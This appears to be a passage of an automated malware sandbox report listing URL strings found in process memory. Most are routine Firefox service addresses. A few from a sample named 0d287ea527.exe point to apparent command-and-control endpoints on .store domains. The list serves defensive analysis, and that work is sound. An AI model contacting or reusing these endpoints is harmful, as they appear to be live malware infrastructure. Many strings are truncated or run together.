Source: firefox.exe, 0000001A.00000002.2933198814.0000053F85E04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2863474387.0000028C99233000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C97326000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtabhttps://getpocket.com/explore
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabresource://activity-stream/common/Actions.sys.m
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 0000001A.00000003.2799161819.0000028CA3172000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2797063483.0000028CA3173000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 0000001A.00000003.2799161819.0000028CA3172000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 0000001A.00000003.2799161819.0000028CA3172000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 0000001A.00000003.2714052213.0000028C9AE3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2860413148.0000028C988E0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2713884695.0000028C9AE1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2715980139.0000028C9AE5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshotsUrgent
Source: firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshotshandleDiscoveryStreamLoadedContent
Source: firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla/webcompat-reporter
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C97326000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 0000001A.00000002.2842783233.0000028C8B011000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 0000001A.00000002.2846282370.0000028C96AF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submitsection.highlights.includeBookmarksresource://nimbus/Ex
Source: firefox.exe, 0000001A.00000003.2799161819.0000028CA3172000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 0000001A.00000003.2799161819.0000028CA3172000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 0000001A.00000003.2799161819.0000028CA3172000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 0000001A.00000003.2799161819.0000028CA3172000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 0000001A.00000002.2876007360.0000028C9B472000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%pack=buttonpack
Source: firefox.exe, 0000001A.00000002.2876007360.0000028C9B461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 0000001A.00000002.2934782130.00002F7FAD103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: firefox.exe, 0000001A.00000002.2934782130.00002F7FAD103000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.comZ
Source: firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.comresource:///modules/PartnerLinkAttribution.sys.mjs
Source: firefox.exe, 0000001A.00000002.2934782130.00002F7FAD103000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.comt
Source: firefox.exe, 0000001A.00000002.2934782130.00002F7FAD103000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.comtZ
Source: firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 0000001A.00000002.2867787047.0000028C9AA2C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2719539849.0000028C9AA33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2851027215.0000028C97FCD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2863474387.0000028C992C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%shttps://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 0000001A.00000002.2867787047.0000028C9AA2C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2719539849.0000028C9AA33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2863474387.0000028C992C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%sCan
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 0000001A.00000002.2867787047.0000028C9AA2C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2719539849.0000028C9AA33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2863474387.0000028C992C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%sresource://gre/mo
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shttps://mail.inbox
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestresource://activity-stream/lib/DefaultSites.sys.mj
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 0000001A.00000002.2846282370.0000028C96AF5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2848761105.0000028C972B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: 0d287ea527.exe, 00000012.00000002.2978043891.00000000010E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store:443/api
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ok.ru/
Source: firefox.exe, 0000001A.00000002.2867787047.0000028C9AA2C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2719539849.0000028C9AA33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2863474387.0000028C992C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%sFailed
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2863474387.0000028C992C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sresource://gre/modules/ExtHandlerService.sys.mjsresource://gr
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: 0d287ea527.exe, 00000012.00000002.2978043891.00000000010E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://presticitpo.store:443/api
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C99257000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 0000001A.00000002.2846282370.0000028C96AF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 0000001A.00000003.2715980139.0000028C9AE5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/bound
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/defineCursorUpdateMethods
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.comXw
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 0000001A.00000002.2909177907.0000028C9E9AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 0000001A.00000002.2909177907.0000028C9E9AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/.
Source: firefox.exe, 0000001A.00000002.2909177907.0000028C9E9AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 0000001A.00000002.2909177907.0000028C9E994000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/userdiscoverystream.spoc.impressionspreffedRegionsBlockString
Source: firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/userdiscoverystream.spoc.impressionspreffedRegionsBlockStringgetValue/pr
Source: firefox.exe, 0000001A.00000002.2884703213.0000028C9CD0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 0000001A.00000002.2884703213.0000028C9CD06000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2883449828.0000028C9CC21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2884703213.0000028C9CD0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: 0d287ea527.exe, 00000009.00000003.2564913479.000000000520E000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2721707943.0000000005912000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2722844496.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: firefox.exe, 0000001A.00000002.2846282370.0000028C96AF5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2863474387.0000028C992E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
